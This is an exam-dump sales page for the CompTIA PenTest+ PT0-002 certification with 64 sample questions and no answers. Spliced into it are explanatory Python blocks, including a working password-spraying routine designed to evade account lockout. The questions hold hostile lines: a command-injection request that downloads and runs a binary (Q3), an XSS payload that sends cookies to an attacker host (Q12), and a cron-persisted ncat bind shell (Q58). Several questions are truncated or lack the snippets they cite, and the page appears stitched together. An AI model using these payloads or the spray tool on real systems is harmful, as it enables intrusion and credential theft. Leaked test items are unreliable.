
PDF Only

$35.00 Free Updates Up to 90 Days

  • PT0-002 Dumps PDF
  • 396 Questions
  • Updated On March 25, 2024

PDF + Test Engine

$60.00 Free Updates Up to 90 Days

  • PT0-002 Question Answers
  • 396 Questions
  • Updated On March 25, 2024

Test Engine

$50.00 Free Updates Up to 90 Days

  • PT0-002 Practice Questions
  • 396 Questions
  • Updated On March 25, 2024
Check Our Free CompTIA PT0-002 Online Test Engine Demo.

How to pass CompTIA PT0-002 exam with the help of dumps?

DumpsPool provides you the finest quality resources you’ve been looking for to no avail. So, it's due time you stop stressing and get ready for the exam. Our Online Test Engine provides you with the guidance you need to pass the certification exam. We guarantee top-grade results because we know we’ve covered each topic in a precise and understandable manner. Our expert team prepared the latest CompTIA PT0-002 Dumps to satisfy your need for training. Plus, they are in two different formats: Dumps PDF and Online Test Engine.

How Do I Know CompTIA PT0-002 Dumps are Worth it?

Did we mention our latest PT0-002 Dumps PDF is also available as an Online Test Engine? And that’s just the point where things start to take root. Of all the features you are offered here at DumpsPool, the money-back guarantee has to be the best one. Now that you know you don’t have to worry about the payment, let us explore all the other reasons you would want to buy from us. Other than affordable Real Exam Dumps, you are offered three months of free updates.

You can easily scroll through our large catalog of certification exams. And, pick any exam to start your training. That’s right, DumpsPool isn’t limited to just CompTIA Exams. We trust our customers need the support of an authentic and reliable resource. So, we made sure there is never any outdated content in our study resources. Our expert team makes sure everything is up to the mark by keeping an eye on every single update. Our main concern and focus are that you understand the real exam format. So, you can pass the exam in an easier way!

IT Students Are Using our CompTIA PenTest+ Certification Exam Dumps Worldwide!

It is a well-established fact that certification exams can’t be conquered without some help from experts. The point of using CompTIA PenTest+ Certification Exam Practice Question Answers is exactly that. You are constantly surrounded by IT experts who’ve been through what you are about to and know better. The 24/7 customer service of DumpsPool ensures you are in touch with these experts whenever needed. Our 100% success rate and validity around the world make us the most trusted resource candidates use. The updated Dumps PDF helps you pass the exam on the first attempt. And, with the money-back guarantee, you feel safe buying from us. You can claim your refund on not passing the exam.

How to Get PT0-002 Real Exam Dumps?

Getting access to the real exam dumps is as easy as pressing a button, literally! There are various resources available online, but the majority of them sell scams or copied content. So, if you are going to attempt the PT0-002 exam, you need to be sure you are buying the right kind of Dumps. All the Dumps PDF available on DumpsPool are as unique and up to date as they can be. Plus, our Practice Question Answers are tested and approved by professionals, making them the top authentic resource available on the internet. Our experts have made sure the Online Test Engine is free from outdated and fake content, repeated questions, and false or indefinite information. We make every penny count, and you leave our platform fully satisfied!

CompTIA PT0-002 COMPLETE EXAM DETAIL

Detail Value
Total Time 165 minutes
Number of Questions Maximum of 85
Exam Fee $349 USD
Passing Marks 750 (on a scale of 100-900)
Available Languages English, Japanese, Portuguese, Thai
Exam Code PT0-002
Exam Format Multiple Choice and Performance-Based
Exam Domains
  • 1.0 Planning and Scoping (14%)
  • 2.0 Information Gathering and Vulnerability Scanning (22%)
  • 3.0 Attacks and Exploits (30%)
  • 4.0 Reporting and Communication (18%)
  • 5.0 Tools and Code Analysis (16%)

CompTIA PenTest+ EXAM TOPICS BREAKDOWN

Domain Percentage Topics
1.0 Planning and Scoping 14%
  • Governance, Risk, and Compliance Concepts
  • Scoping and Organizational/Customer Requirements
  • Professionalism and Integrity
2.0 Information Gathering and Vulnerability Scanning 22%
  • Passive Reconnaissance
  • Active Reconnaissance
  • Analyzing Reconnaissance Results
  • Vulnerability Scanning
3.0 Attacks and Exploits 30%
  • Network Attacks
  • Wireless Attacks
  • Application-Based Attacks
  • Cloud Attacks
  • Specialized Systems (Mobile, IoT, ICS/SCADA)
  • Social Engineering and Physical Attacks
  • Post-Exploitation Techniques
4.0 Reporting and Communication 18%
  • Report Components
  • Remediation Recommendations
  • Communication During the Engagement
  • Post-Report Delivery Activities
5.0 Tools and Code Analysis 16%
  • Basic Scripting and Software Development Concepts
  • Analyzing Scripts and Code Samples
  • Tool Use Cases
CompTIA PT0-002 Sample Question Answers

Question # 1

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance?

A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng

Question # 2

Given the following script:

    while True:
        print("Hello World")

Which of the following describes True?

A. A while loop
B. A conditional
C. A Boolean operator
D. An arithmetic operator

Question # 3

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

    exploit = "POST "
    exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
    exploit += " HTTP/1.1"

Which of the following commands should the penetration tester run post-engagement?

A. grep -v apache ~/.bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM "apache" /F

Question # 4

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

A. Alternate data streams
B. PowerShell modules
C. MP4 steganography
D. PsExec

Question # 5

Which of the following is a regulatory compliance standard that focuses on user privacy byimplementing the right to be forgotten?

A. NIST SP 800-53
B. ISO 27001
C. GDPR

Question # 6

During an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

A. Implementation of patching and change control programs
B. Revision of client scripts used to perform system updates
C. Remedial training for the client's systems administrators
D. Refrainment from patching systems until quality assurance approves

Question # 7

Which of the following OSSTMM testing methodologies should be used to test under the worst conditions?

A. Tandem
B. Reversal
C. Semi-authorized
D. Known environment

Question # 8

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code: Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

A. sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds.
B. *range(1, 1025) on line 1 populated the portList list in numerical order.
C. Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM
D. The remoteSvr variable has neither been type-hinted nor initialized.
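The scanner snippet itself is not reproduced on this page. As an added illustration (not the question's code), the block below pairs a naive sequential connect() scanner with the heuristic an IDS typically applies to such traffic: one source touching many distinct destination ports on one host inside a short window. The hosts, the 20 ms gap between attempts and the alert threshold are assumptions; the connection log is constructed from them, so the detection runs offline.

```python
import socket
from collections import defaultdict


def tcp_connect_scan(target, ports, timeout=0.5):
    """Naive sequential TCP connect() scan; returns the list of open ports.
    Every attempt, open or closed, is a SYN that the target's sensors see."""
    open_ports = []
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            if sock.connect_ex((target, port)) == 0:
                open_ports.append(port)
        finally:
            sock.close()
    return open_ports


def scan_events(src, dst, ports, start=0.0, gap=0.02):
    """Constructed connection log: the (timestamp, src, dst, dport) records a sensor
    would see from the scan above, assuming one attempt every `gap` seconds."""
    return [(start + i * gap, src, dst, port) for i, port in enumerate(ports)]


def detect_port_scans(events, threshold=20, window=5.0):
    """Minimal IDS heuristic: one alert per (src, dst) once that source has hit at
    least `threshold` distinct destination ports within `window` seconds.
    Port order does not matter; breadth and rate are what trigger the alert."""
    recent = defaultdict(list)   # (src, dst) -> [(ts, dport), ...] still inside the window
    alerted = set()
    alerts = []
    for ts, src, dst, dport in sorted(events):
        key = (src, dst)
        history = [(t, p) for t, p in recent[key] if ts - t <= window]
        history.append((ts, dport))
        recent[key] = history
        distinct_ports = {p for _, p in history}
        if len(distinct_ports) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": src, "dst": dst, "ports": len(distinct_ports), "at": ts})
    return alerts


if __name__ == "__main__":
    # Constructed traffic: a 1-1024 sweep from 10.0.0.5 plus ordinary HTTPS traffic from 10.0.0.9.
    sweep = scan_events("10.0.0.5", "10.0.0.10", range(1, 1025))
    normal = [(t, "10.0.0.9", "10.0.0.10", 443) for t in (0.1, 0.9, 3.2)]
    for alert in detect_port_scans(sweep + normal):
        print("probable port scan:", alert)
```

Against the constructed log the sweep is flagged on its 20th attempt, under half a second in, while the host browsing 443 three times never is; feeding the same port list in reverse order is flagged just the same, which is why spreading a scan over time, not shuffling it, is what lowers its profile.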

Question # 9

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

A. Ensure the client has signed the SOW.
B. Verify the client has granted network access to the hot site.
C. Determine if the failover environment relies on resources not owned by the client.
D. Establish communication and escalation procedures with the client.

Question # 10

Which of the following factors would a penetration tester most likely consider when testing at a location?

A. Determine if visas are required.
B. Ensure all testers can access all sites.
C. Verify the tools being used are legal for use at all sites.
D. Establish the time of the day when a test can occur.

Question # 11

A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output?

A. The HTTP port is not open on the firewall.
B. The tester did not run sudo before the command.
C. The web server is using HTTPS instead of HTTP.
D. This URI returned a server error.

Question # 12

Given the following code (delivered URL-encoded, with + and %20 decoding to spaces):

    var img=new Image();img.src="http://hacker/" + document.cookie;</SCRIPT>

Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding
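The payload above reflects untrusted input into the page and sends document.cookie to an attacker host. As an added example (not code from the question), the block below shows the vulnerable rendering next to the two defences the question is after: context-aware output encoding and allowlist input validation. The page template, the REFLECTED wrapper that closes the surrounding script tag, and the allowed-character set are assumptions for the demonstration.

```python
import html
from urllib.parse import quote

# Payload from the question, and the form it takes when reflected through a
# parameter: close the page's own <SCRIPT> first, then open a new one (assumed wrapper).
PAYLOAD = 'var img=new Image();img.src="http://hacker/" + document.cookie;</SCRIPT>'
REFLECTED = "</SCRIPT><SCRIPT>" + PAYLOAD


def render_vulnerable(name):
    """Reflects user input straight into the HTML body: the XSS in the question."""
    return "<p>Hello " + name + "</p>"


def render_encoded(name):
    """Same page with the input encoded for an HTML text/attribute context.
    The browser shows the literal characters; nothing becomes markup."""
    return "<p>Hello " + html.escape(name, quote=True) + "</p>"


def render_link(target):
    """URL context needs its own encoder; html.escape alone leaves '/' and ':' intact."""
    return '<a href="/search?q=' + quote(target, safe="") + '">search</a>'


# Input validation: allowlist what a display name may contain, reject the rest.
# Validation narrows the attack surface; encoding on output is still required.
ALLOWED_NAME_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 .-'")


def validate_name(name, max_len=64):
    return 0 < len(name) <= max_len and all(ch in ALLOWED_NAME_CHARS for ch in name)


def contains_script(page):
    """Crude check used here to show whether the payload survived as markup."""
    lowered = page.lower()
    return "<script" in lowered or "</script" in lowered


if __name__ == "__main__":
    print(render_vulnerable(REFLECTED))   # payload lands as live markup
    print(render_encoded(REFLECTED))      # rendered as &lt;/SCRIPT&gt;... text
    print(render_link(REFLECTED))         # percent-encoded inside the href
    print(validate_name(REFLECTED))       # rejected before it reaches the template
```

The two defences are complementary: validation rejects input that has no business containing angle brackets, and encoding protects every output context even when validation is bypassed or the data arrived from a database rather than a request.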

Question # 13

A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the... Which of the following techniques is the penetration tester using?

A. Password brute force attack
B. SQL injection
C. Password spraying
D. Kerberoasting
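The distinguishing feature of the technique in this question is the loop order: one candidate password across every account, rather than every password against one account, which is what keeps each account under its lockout threshold. As an added example (not the tester's tool), the block below implements that schedule with a per-account attempt budget and a wait that lets the oldest attempt age out of the lockout window. The mock directory, the mock login function, the threshold of 5 and the 30-minute window are assumptions; the clock is injectable so the schedule can be dry-run without waiting.

```python
import time
from collections import defaultdict

# Constructed directory standing in for the webmail server's user base.
MOCK_DIRECTORY = {
    "alice": "123change",
    "bob": "Winter2024!",
    "carol": "123change",
    "dave": "correct horse battery staple",
}


def mock_login(username, password):
    """Stand-in for the webmail login POST; True on a valid credential."""
    return MOCK_DIRECTORY.get(username) == password


class FakeClock:
    """Replaces time.time/time.sleep so a run can be simulated instantly."""
    def __init__(self):
        self.t = 0.0

    def now(self):
        return self.t

    def sleep(self, seconds):
        self.t += seconds


def spray(usernames, passwords, login, lockout_threshold=5,
          observation_window=1800.0, now=time.time, sleep=time.sleep):
    """Password spraying: each password is tried across all usernames before the
    next password is used. No account receives more than lockout_threshold - 1
    attempts inside observation_window seconds."""
    attempts = defaultdict(list)            # username -> attempt timestamps
    budget = max(1, lockout_threshold - 1)  # attempts allowed per account per window
    hits = []
    for password in passwords:              # outer loop: the password
        for user in usernames:              # inner loop: the accounts (the spray)
            recent = [t for t in attempts[user] if now() - t < observation_window]
            if len(recent) >= budget:
                # wait until the oldest attempt falls outside the window
                sleep(observation_window - (now() - recent[0]))
            attempts[user].append(now())
            if login(user, password):
                hits.append((user, password))
    return hits


def brute_force_order(usernames, passwords):
    """For contrast: classic brute force exhausts all passwords per account, so the
    first account is locked after lockout_threshold attempts."""
    return [(u, p) for u in usernames for p in passwords]


def spray_order(usernames, passwords):
    """The order spray() actually submits: password-major, account-minor."""
    return [(u, p) for p in passwords for u in usernames]


if __name__ == "__main__":
    clock = FakeClock()
    users = list(MOCK_DIRECTORY)
    print(spray(users, ["123change"], mock_login, now=clock.now, sleep=clock.sleep))
```

Against the constructed directory the single-password spray finds the two accounts still on the help desk reset value without any account exceeding one attempt. Pushing six passwords through with a threshold of 5 forces one full window of waiting before the fifth attempt on each account, which is the cost of staying under lockout on an internet-facing service.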

Question # 14

A penetration tester is exploring a client’s website. The tester performs a curl command and obtains the following:

    * Connected to 10.2.11.144 (::1) port 80 (#0)
    > GET /readmine.html HTTP/1.1
    > Host: 10.2.11.144
    > User-Agent: curl/7.67.0
    > Accept: */*
    >
    * Mark bundle as not supporting multiuse
    < HTTP/1.1 200
    < Date: Tue, 02 Feb 2021 21:46:47 GMT
    < Server: Apache/2.4.41 (Debian)
    < Content-Length: 317
    < Content-Type: text/html; charset=iso-8859-1
    <
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta name="viewport" content="width=device-width" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>WordPress &#8250; ReadMe</title>
    <link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" />
    </head>

Which of the following tools would be BEST for the penetration tester to use to explore this site further?

A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP

Question # 15

When accessing the URL http://192.168.0.1/validate/user.php, a penetration tester obtained the following output:

    ..d index: eid in /apache/www/validate/user.php line 12
    ..d index: uid in /apache/www/validate/user.php line 13
    ..d index: pw in /apache/www/validate/user.php line 14
    ..d index: acl in /apache/www/validate/user.php line 15

A. Lack of code signing
B. Incorrect command syntax
C. Insufficient error handling
D. Insecure data transmission

Question # 16

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands: Which of the following attacks is the penetration tester most likely trying to perform?

A. Metadata service attack
B. Container escape techniques
C. Credential harvesting
D. Resource exhaustion

Question # 17

A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet." For which of the following audiences was this message intended?

A. Systems administrators
B. C-suite executives
C. Data privacy ombudsman
D. Regulatory officials

Question # 18

A penetration tester runs a scan against a server and obtains the following output:

    21/tcp   open  ftp                Microsoft ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | 03-12-20  09:23AM       331 index.aspx
    | ftp-syst:
    135/tcp  open  msrpc              Microsoft Windows RPC
    139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds       Microsoft Windows Server 2012 Std
    3389/tcp open  ssl/ms-wbt-server
    | rdp-ntlm-info:
    |   Target Name: WEB3
    |   NetBIOS_Computer_Name: WEB3
    |   Product_Version: 6.3.9600
    |_  System_Time: 2021-01-15T11:32:06+00:00
    8443/tcp open  http               Microsoft IIS httpd 8.5
    | http-methods:
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/8.5
    |_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

A. ftp 192.168.53.23
B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 -U guest
C. ncrack -u Administrator -P 15worst_passwords.txt -p rdp 192.168.53.23
D. curl -X TRACE https://192.168.53.23:8443/index.aspx
E. nmap --script vuln -sV 192.168.53.23

Question # 19

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

A. Create a custom password dictionary as preparation for password spray testing.
B. Recommend using a password manager/vault instead of text files to store passwords securely.
C. Recommend configuring password complexity rules in all the systems and applications.
D. Document the unprotected file repository as a finding in the penetration-testing report.

Question # 20

A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine: Which of the following would be the BEST command to use for further progress into the targeted network?

A. nc 10.10.1.2
B. ssh 10.10.1.2
C. nc 127.0.0.1 5555
D. ssh 127.0.0.1 5555

Question # 21

Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?

A. dig company.com MX
B. whois company.com
C. curl www.company.com
D. dig company.com A

Question # 22

During an assessment, a penetration tester inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below. Which of the following vulnerabilities was the attacker trying to exploit?

A. Session hijacking
B. URL manipulation
C. SQL injection
D. Insecure direct object reference

Question # 23

A penetration tester writes the following script: Which of the following is the tester performing?

A. Searching for service vulnerabilities
B. Trying to recover a lost bind shell
C. Building a reverse shell listening on specified ports
D. Scanning a network for specific open ports

Question # 24

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames. Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

A. Sniff and then crack the WPS PIN on an associated WiFi device.
B. Dump the user address book on the device.
C. Break a connection between two Bluetooth devices.
D. Transmit text messages to the device.

Question # 25

A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack. Which of the following should a tester perform first?

A. Test the strength of the encryption settings.
B. Determine if security tokens are easily available.
C. Perform a vulnerability check against the hypervisor.
D. Scan the containers for open ports.

Question # 26

A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should the penetration tester try next?

A. Dumpster diving
B. Phishing
C. Shoulder surfing
D. Tailgating

Question # 27

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

Question # 28

Which of the following documents describes activities that are prohibited during a scheduled penetration test?

A. MSA
B. NDA
C. ROE
D. SLA

Question # 29

During a penetration test, a tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target's public web ... Which of the following actions should the penetration tester perform next?

A. Continue the assessment and mark the finding as critical.
B. Attempt to remediate the issue temporarily.
C. Notify the primary contact immediately.
D. Shut down the web server until the assessment is finished.

Question # 30

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A. Badge cloning 
B. Watering-hole attack 
C. Impersonation 
D. Spear phishing

Question # 31

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible? 

A. A list 
B. A tree 
C. A dictionary 
D. An array 

Question # 32

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information? 

A. Badge cloning 
B. Dumpster diving 
C. Tailgating 
D. Shoulder surfing 

Question # 33

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision? 

A. The tester had the situational awareness to stop the transfer. 
B. The tester found evidence of prior compromise within the data set. 
C. The tester completed the assigned part of the assessment workflow. 
D. The tester reached the end of the assessment time frame. 

Question # 34

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective? 

A. Wait for the next login and perform a downgrade attack on the server. 
B. Capture traffic using Wireshark. 
C. Perform a brute-force attack over the server. 
D. Use an FTP exploit against the server. 

Question # 35

Given the following output: User-agent:* Disallow: /author/ Disallow: /xmlrpc.php Disallow: /wp-admin Disallow: /page/ During which of the following activities was this output MOST likely obtained? 

A. Website scraping 
B. Website cloning
C. Domain enumeration
D. URL enumeration 

Question # 36

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment? 

A. Partially known environment testing 
B. Known environment testing 
C. Unknown environment testing 
D. Physical environment testing 

Question # 37

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router. Which of the following is MOST vulnerable to a brute-force attack? 

A. WPS 
B. WPA2-EAP 
C. WPA-TKIP
D. WPA2-PSK

Question # 38

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report? 

A. S/MIME 
B. FTPS 
C. DNSSEC 
D. AS2 

Question # 39

A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit? 

A. Perform XSS. 
B. Conduct a watering-hole attack. 
C. Use BeEF. 
D. Use browser autopwn. 

Question # 40

A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement? 

A. Prying the lock open on the records room 
B. Climbing in an open window of the adjoining building 
C. Presenting a false employee ID to the night guard 
D. Obstructing the motion sensors in the hallway of the records room 

Question # 41

A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?

A. Nmap 
B. Wireshark 
C. Metasploit 
D. Netcat 

Question # 42

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data? 

A. An unknown-environment assessment 
B. A known-environment assessment 
C. A red-team assessment 
D. A compliance-based assessment 

Question # 43

Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems: 

A. will reveal vulnerabilities in the Modbus protocol. 
B. may cause unintended failures in control systems. 
C. may reduce the true positive rate of findings. 
D. will create a denial-of-service condition on the IP networks. 

Question # 44

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions? 

A. Aircrack-ng 
B. Wireshark 
C. Wifite 
D. Kismet 

Question # 45

During an engagement, a penetration tester found the following list of strings inside a file:  Which of the following is the BEST technique to determine the known plaintext of the strings?

A. Dictionary attack 
B. Rainbow table attack 
C. Brute-force attack 
D. Credential-stuffing attack 

Question # 46

During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT? 

A. Deny that the vulnerability existed 
B. Investigate the penetration tester.
C. Accept that the client was right.
D. Fire the penetration tester. 

Question # 47

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because: 

A. security compliance regulations or laws may be violated. 
B. testing can make detecting actual APT more challenging. 
C. testing adds to the workload of defensive cyber- and threat-hunting teams. 
D. business and network operations may be impacted. 

Question # 48

Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks? 

A. Scraping social media for personal details 
B. Registering domain names that are similar to the target company's
C. Identifying technical contacts at the company
D. Crawling the company's website for company information 

Question # 49

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:  Which of the following tools will help the tester prepare an attack for this scenario?

A. Hydra and crunch 
B. Netcat and cURL 
C. Burp Suite and DIRB 
D. Nmap and OWASP ZAP 

Question # 50

A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use? 

A. nmap -sn 192.168.0.1/16
B. nmap -sn 192.168.0.1-254
C. nmap -sn 192.168.0.1 192.168.0.1.254
D. nmap -sN 192.168.0.0/24

Question # 51

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL? 

A. SQLmap 
B. Nessus 
C. Nikto 
D. DirBuster 

Question # 52

A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network? 

A. Set up a captive portal with embedded malicious code. 
B. Capture handshakes from wireless clients to crack. 
C. Span deauthentication packets to the wireless clients. 
D. Set up another access point and perform an evil twin attack. 

Question # 53

Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.) 

A. Use of non-optimized sort functions 
B. Poor input sanitization 
C. Null pointer dereferences 
D. Non-compliance with code style guide 
E. Use of deprecated Javadoc tags 
F. A cyclomatic complexity score of 3

Question # 54

The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host discovery and write the discovery to files without returning results of the attack machine?

A. nmap -sn -n --exclude 10.1.1.15 10.1.1.0/24 -oA target_txt
B. nmap -iR 10 -oX out.xml | grep Nmap | cut -d " " -f5 > live-hosts.txt
C. nmap -Pn -sV -O -iL target.txt -A target_text_Service
D. nmap -sS -Pn -n -iL target.txt -A target_txtl

Question # 55

A security analyst needs to perform a scan for SMB port 445 over a /16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

A. nmap -s 445 -Pn -T5 172.21.0.0/16
B. nmap -p 445 -n -T4 --open 172.21.0.0/16
C. nmap -sV --script=smb* 172.21.0.0/16
D. nmap -p 445 -max -sT 172.21.0.0/16

Question # 56

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them? 

A. As backup in case the original documents are lost 
B. To guide them through the building entrances 
C. To validate the billing information with the client 
D. As proof in case they are discovered 

Question # 57

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred? 

A. The SSL certificates were invalid. 
B. The tester IP was blocked. 
C. The scanner crashed the system. 
D. The web page was not found. 

Question # 58

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop. Which of the following can be used to ensure the tester is able to maintain access to the system? 

A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
B. wmic startup get caption,command
C. (crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user

Question # 59

A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system. After running a few commands, the tester runs the following: python -c 'import pty; pty.spawn("/bin/bash")' Which of the following actions is the penetration tester performing?

A. Privilege escalation 
B. Upgrading the shell 
C. Writing a script for persistence 
D. Building a bind shell 

Question # 60

After running the enum4linux.pl command, a penetration tester received the following output:  Which of the following commands should the penetration tester run NEXT?

A. smbspool //192.160.100.56/print$ 
B. net rpc share -S 192.168.100.56 -U '' 
C. smbget //192.168.100.56/web -U '' 
D. smbclient //192.168.100.56/web -U '' -N 

Question # 61

Which of the following is a rules engine for managing public cloud accounts and resources? 

A. Cloud Custodian 
B. Cloud Brute 
C. Pacu 
D. Scout Suite 

Question # 62

Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools? 

A. Dictionary 
B. Directory 
C. Symlink 
D. Catalog 
E. For-loop 

Question # 63

A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.) 

A. A handheld RF spectrum analyzer 
B. A mask and personal protective equipment 
C. Caution tape for marking off insecure areas 
D. A dedicated point of contact at the client 
E. The paperwork documenting the engagement 
F. Knowledge of the building's normal business hours 

Question # 64

A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement? 

A. Direct-to-origin 
B. Cross-site scripting 
C. Malware injection 
D. Credential harvesting 

Question # 65

